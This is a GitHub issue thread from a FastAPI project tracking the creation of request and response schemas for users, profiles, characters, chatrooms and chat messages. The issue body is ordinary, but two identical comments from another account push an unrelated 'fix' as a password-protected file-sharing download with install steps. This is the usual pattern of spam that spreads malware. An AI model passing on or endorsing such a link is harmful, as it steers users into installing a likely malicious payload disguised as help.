### ISSUE TITLE
[Feat] 스키마 만들기

### ISSUE THREAD

**Issue by nonamed000** [Emozis-GenAI/fastapi#2]
📝Description
- Request, Response에 대한 스키마를 생성 후, 라우터 코딩

✅TODO
- [x] User
- [x] Profile
- [x] Character
- [x] Chatroom
- [x] Chatting

👣ETC
-

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
